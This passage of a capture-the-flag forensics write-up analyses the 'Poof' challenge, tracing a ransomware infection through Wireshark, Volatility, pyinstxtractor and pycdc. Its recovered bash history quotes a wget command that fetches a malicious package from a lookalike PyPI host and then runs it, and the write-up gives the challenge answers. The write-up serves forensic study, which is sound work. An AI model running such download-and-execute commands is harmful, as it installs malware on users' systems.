AKwAkAHIAKQAgAC0AagBvAGkAbgAgACcAIAAnACkAfQAgAHMAbABlAGUAcAAgADAALgA4AH0ASABUAEIAewA1AHUAcAAzAHIAXwAzADQANQB5AF8AbQA0AGMAcgAwADUAfQA=after decoding it, we get a UTF-16 (windows, duh) encoded PowerShell script, which contains the flag.
Poof
This is a typical memory forensics challenge with some unique challenges in it. most people generally use volatility for the analysis of dmp file. I do the same and honestly, I don’t know any better tool. download the challenge files from here and download the volatility2 from here.
The first question the challenge asks is: `what was the malicious URL that the ransomware was downloaded from?`. well to answer that, I don’t think we need to use volatility. we are given a PCAP file. open it with Wireshark and filter out HTTP traffic.
and we see two HTTP packets, the first one containing the URL.
the second question is: `what is the name of the malicious process?`
Copy the ubuntu_profile zip file to `volatility/volatility/plugins/overlays/linux/` and see the new loaded profile with –info flag.
10:13:01 root@kali poof → python2 ./volatility/vol.py --info | head
Volatility Foundation Volatility Framework 2.6.1
Profiles
--------
LinuxUbuntu_4_15_0-184-generic_profilex64 - A Profile for Linux Ubuntu_4.15.0-184-generic_profile x64
VistaSP0x64 - A Profile for Windows Vista SP0 x64
VistaSP0x86 - A Profile for Windows Vista SP0 x86
VistaSP1x64 - A Profile for Windows Vista SP1 x64
VistaSP1x86 - A Profile for Windows Vista SP1 x86
VistaSP2x64 - A Profile for Windows Vista SP2 x64
now we can see the plugings we can use for this profile using `–help`.
python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp --helphere, we see the pstree plugin which will result something like this.
10:17:32 root@kali poof → python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp linux_pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid Uid
systemd 1
.systemd-journal 429
.lvmetad 439
.systemd-udevd 453
.systemd-timesyn 636 62583
.systemd-network 734 100
.systemd-resolve 751 101
.accounts-daemon 820
.dbus-daemon 822 103
.networkd-dispat 839
.lxcfs 841
.rsyslogd 846 102
.systemd-logind 856
.atd 857
.cron 864
.unattended-upgr 873
.polkitd 874
.agetty 890
.sshd 891
..sshd 1171
...sshd 1311 1000
....bash 1312 1000
.....configure 1340 1000
......configure 1341 1000
.systemd 1182 1000
..(sd-pam) 1184 1000
[kthreadd] 2
.[kworker/0:0] 3
.[kworker/0:0H] 4
.[kworker/u2:0] 5
.[mm_percpu_wq] 6
....we can see that there was a ssh connection established and in that bash binary is being run as a child process. so, we can check bash history using `linux_bash` plugin.
07:46:55 root@kali poof → python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
1312 bash 2022-10-20 09:10:22 UTC+0000 ls
1312 bash 2022-10-20 09:10:22 UTC+0000 pwd
1312 bash 2022-10-20 09:10:22 UTC+0000 sudo poweroff
1312 bash 2022-10-20 09:10:22 UTC+0000 history
1312 bash 2022-10-20 09:10:22 UTC+0000 ip a
1312 bash 2022-10-20 09:10:22 UTC+0000 sudo poweroff
1312 bash 2022-10-20 09:10:23 UTC+0000 ls
1312 bash 2022-10-20 09:10:25 UTC+0000 ls
1312 bash 2022-10-20 09:10:25 UTC+0000 cd Documents/
1312 bash 2022-10-20 09:10:27 UTC+0000 cd halloween_python_game/
1312 bash 2022-10-20 09:10:27 UTC+0000 ls
1312 bash 2022-10-20 09:10:36 UTC+0000 wget http://files.pypi-install.com/packages/a5/61/caf3af6d893b5cb8eae9a90a3054f370a92130863450e3299d742c7a65329d94/pygaming-dev-13.37.tar.gz
1312 bash 2022-10-20 09:10:47 UTC+0000 tar -xf pygaming-dev-13.37.tar.gz
1312 bash 2022-10-20 09:10:48 UTC+0000 ls
1312 bash 2022-10-20 09:10:51 UTC+0000 cd pygaming-dev-13.37/
1312 bash 2022-10-20 09:10:52 UTC+0000 ls
1312 bash 2022-10-20 09:10:57 UTC+0000 ./configure
it is all clear what run into the server (./configure). the tar zip gets downloaded and after extracting it, user goes to pygaming-dev-13.37 directory and run configure.
now the challange wants us to provide md5sum of ransomeware file. which means we need to dump the tar archieve. we can do that by going into File>Export Objects>HTTP
we can save it extract out the configure file. to calculate the md5 of the file, use this command:
08:22:58 root@kali pygaming-dev-13.37 → md5sum ./configure
7c2ff873ce6b022663a1f133383194cc ./configure
next question it asks : ‘which programming language is used to develop this ‘.
I run `strings` on the configure which shows some data related to `python`. and I assumed it to be the py2exe binary which is correct. answer was python.
next, it asks us to decompile the python ELF binary we can use this pyextractor .
root@lucky:~/decompile-py2exe/pyinstxtractor# python3 pyinstxtractor.py ../configure
[+] Processing ../configure
[+] Pyinstaller version: 2.1+
[+] Python version: 3.6
[+] Length of package: 7448520 bytes
[+] Found 79 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: configure.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.6 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ../configure
we can see its result in `configure_extracted` directory. there is a pyc file name `configure.pyc`. we need to extract python source code from it. there is a tool to do that `pycdc`.
installation steps:
apt install cmake -y
git clone https://github.com/zrax/pycdc
cd pycdc
mkdir build; cd build
cmake
make installThis will install the `pydc`in your system. run the following command to get the source from configure.pyc.
10:26:01 root@kali pygaming-dev-13.37 → pycdc ./configure.pyc | head
# Source Generated with Decompyle++
# File: configure.pyc (Python 3.6)
from Crypto.Cipher import AES
import random
import string
import time
import os
def Pkrr1fe0qmDD9nKx(filename = None, data = None):
...There is a function which is using AES encryption function. thats the correct answer(mv18jiVh6TJI9lzY).
